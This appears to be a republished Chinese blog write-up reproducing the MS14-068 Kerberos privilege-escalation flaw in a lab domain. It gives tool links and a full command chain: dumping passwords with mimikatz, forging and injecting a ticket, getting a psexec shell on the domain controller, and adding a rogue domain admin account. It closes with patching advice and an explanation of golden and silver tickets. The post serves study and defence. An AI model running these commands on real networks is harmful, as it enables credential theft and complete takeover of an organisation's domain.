MS14-068漏洞复现

这篇具有很好参考价值的文章主要介绍了MS14-068漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

漏洞概述:

该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。也就是说,你在一台普通域用户的机器上利用这个漏洞,那么这个域用户就变成域管理员权限,然后该域用户就可以控制整个域的所有机器了。

影响版本:

全部版本Windows服务器

漏洞利用前提

  1. 域控没有打MS14-068的补丁(KB3011780)

  2. 拿下一台加入域的计算机(拥有一台域用户的权限)

  3. 有这台域内计算机的域用户密码和Sid

工具下载地址

Ms14-068.exe 下载地址:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

PSexec 下载地址:https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe

mimikatz 下载地址:https://github.com/gentilkiwi/mimikatz/releases

环境

域控:win 2008 R2 192.168.1.106 域内主机:win 7 192.168.1.109

漏洞利用思路

  1. 首先利用ms14-068提权工具生成伪造的kerberos协议认证证书(黄金票据)

  2. 利用mimikatz.exe将证书写入,从而提升为域管理员

  3. 测试是否能访问域控C盘目录,能访问则说明提升为域管理员

  4. 利用PsExec.exe获取域控shell,添加用户并将其加入域管理员组

漏洞复现过程

net config workstation

通过命令:net config workstation,可知域名和其他信息。

MS14-068漏洞复现

 

通过命令:nltest /dsgetdc:域名,可知 DC 主机名。

MS14-068漏洞复现

 

如果不是只是本地用户可以用mimikatz 抓取本地的域用户密码

记住mimikatz要有管理员权限不然无法抓取内存密码,可以以管理员权限运行。

输入privilege::debug 权限提升,在输入log 会在当前文件夹下生成后面命令执行的结果方便我们查找数据,最后输入sekurlsa::logonPasswords 抓取密码

这里利用 MS14-068 来提权,先检查下是否有 MS14-068, CVE 编号CVE-2014-6324, 补丁为 3011780 : systeminfo |find "3011780",如果返回为空就说明没有打补丁,存在漏洞,需要注意的是域内普通用户提权成功后是有时效性的。。

whoami /all 查看用户sid。

MS14-068漏洞复现

 

访问 08server-ad 失败 提示拒绝访问

MS14-068漏洞复现

 

使用 MS14-068 伪造票据: 执行命令:

ms14-068.exe -u test@moonsec.fbi -p 123456 -s S-1-5-21-2801122135-3886333168-273474972-1103 -d 08server-dc.moonsec.fbi

会在当前目录下生成一个凭证。

使用方法:

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员 sid -d 域控制器地址

MS14-068漏洞复现

 

使用 mimikatz 清空之前缓存的凭证,导入伪造的凭证:

mimikatz # kerberos::purge //清空票据

mimikatz # kerberos::ptc 票据文件地址

MS14-068漏洞复现

 

再输入 dir \08server-dc.moonsec.fbi\c$,发现访问成功,现在我们有域管的权限:

MS14-068漏洞复现

 

利用psexec获取域控权限

psexec.exe \08server-dc.moonsec.fbi cmd

MS14-068漏洞复现

 

添加域管账号密码

net user yesir123 QWE123... /add /domain 
net group "Domain Admins" yesir /add /domain

MS14-068漏洞复现

 

防范建议

针对 Kerberos 域用户提权漏洞: 开启 Windows update 功能,进行自动更新

手动下载补丁包进行修复:Microsoft Security Bulletin MS14-068 - Critical | Microsoft Learn

对域内账号进行控制,禁止使用弱口令、定期修改密码 在服务器上安装杀毒软件,及时更新病毒库

原理

Kerberos流程

MS14-068漏洞复现

PAC原理

MS14-068漏洞复现

黄金票据

(身份认证票据) 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。如下图所示,与域控制器没有AS-REQ或AS-REP(步骤1和2)通信。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由域Kerberos帐户(KRBTGT)加密和签名的。TGT仅用于向域控制器上的KDC服务证明用户已被其他域控制器认证。TGT被KRBTGT密码散列加密并且可以被域中的任何KDC服务解密的。

MS14-068漏洞复现

白银票据

(服务授予票据)

白银票据(Silver Tickets)是伪造Kerberos票证授予服务(TGS)的票也称为服务票据。如下图所示,与域控制器没有AS-REQ 和 AS-REP(步骤1和2),也没有TGS-REQ / TGS-REP(步骤3和4)通信。由于银票是伪造的TGS,所以没有与域控制器通信。

MS14-068漏洞复现

参考链接

MS14-068漏洞复现_匿名靓仔的博客-CSDN博客

MS14-068(CVE-2014-6324)域控提权利用及原理解析 - 紅人 - 博客园

Kerberos的黄金票据详解 - 渗透测试中心 - 博客园

Kerberos的白银票据详解 - 渗透测试中心 - 博客园

MS14-068漏洞复现

 

明月装饰了你的窗子,你装饰了别人的梦文章来源地址https://www.toymoban.com/news/detail-469686.html

到了这里,关于MS14-068漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 漏洞复现-永恒之蓝(MS17-010)

    目录 一,漏洞介绍 1,永恒之蓝是什么? 2,漏洞原理 3,影响版本 二,实验环境 三,漏洞复现 四,利用exploit模块进行渗透          永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”

    2024年02月13日
    浏览(73)
  • ms17-010(永恒之蓝)漏洞复现

    目录 前言 一、了解渗透测试流程  二、使用nmap工具对win7进行扫描 三、尝试ms17-010漏洞利用 四、结果展示 总结 🌈嗨!我是Filotimo__🌈。很高兴与大家相识,希望我的博客能对你有所帮助。 💡本文由Filotimo__✍️原创,首发于CSDN📚。 📣如需转载,请事先与我联系以获得授

    2024年02月09日
    浏览(37)
  • 永恒之蓝(MS17-010)漏洞复现

    目录 漏洞简介 漏洞描述 影响版本 复现环境 攻击机 IP:192.168.109.132 靶机 IP:192.168.109.130 开启远程设置 卸载全部安全补丁 复现过程 一、主机发现 二、打开metasploit工具 三、使用msf搜寻MS17-010漏洞 四、使用MS17-010扫描模块,对靶机进行扫描 1.使用扫描模块 2.查看模块需要配置

    2024年02月13日
    浏览(47)
  • 永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 环境 信息收集 先扫描目标靶机IP 进入MSF查看是否存在永恒之蓝的漏洞 攻击 攻击机:kali 靶机:Windows Server 2008 对ip进行收集开放什么端口 先扫描目标靶机IP 因为在同一个内网之中 所以可以使用arp-scan -l 进行查询 知道目标靶机IP(192.168.162.146)来进

    2024年03月25日
    浏览(51)
  • 【ms17-010】永恒之蓝漏洞复现

    准备工作 攻击机:kali,ip:192.168.56.128 靶机:windows server 2003,ip:192.168.56.132 工具:nmap(扫描)、msf 漏洞利用 首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况 此时已经扫描出来了,ip为: 192.168.56.132 的主机开启,并且显示了开放的端口号。 然后我们可以使用:

    2024年01月19日
    浏览(40)
  • 永恒之蓝ms17_010漏洞复现

    攻击机:Linux kali(IP:192.168.52.132) 靶机:Windows 7(x64)(IP:192.168.52.130) 条件:靶机防火墙关闭,两台机子能够相互ping通,靶机445端口开启(永恒之蓝漏洞就是通过恶意代码扫描并攻击开放445端口的 Windows 主机)   登录 kali linux,用 nmap 探测本网段存活主机 nmap 192.168.5

    2024年02月11日
    浏览(38)
  • 《MS17-010(永恒之蓝)—漏洞复现及防范》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 - 永恒之蓝 永恒之蓝(Eternal Blue)是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。而SMB服务是一个协议名,它能被用于Web连接和客户端与服

    2024年02月06日
    浏览(86)
  • ms17-010(永恒之蓝) 漏洞复现与处理

    ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入

    2024年02月09日
    浏览(43)
  • MS17-010(永恒之蓝)漏洞分析与复现

    一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广

    2024年02月02日
    浏览(39)
  • 永恒之蓝漏洞复现(ms17-010)----保姆级教程

    攻击机: kali Linux             靶机: win7 x64    提示:  复现攻击前请关闭杀毒软件   1.复现第一步按以下操作打开 445端口: 在 \\\"运行\\\" 里输入: regedit 打开注册表编辑器                                                                    

    2023年04月08日
    浏览(45)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包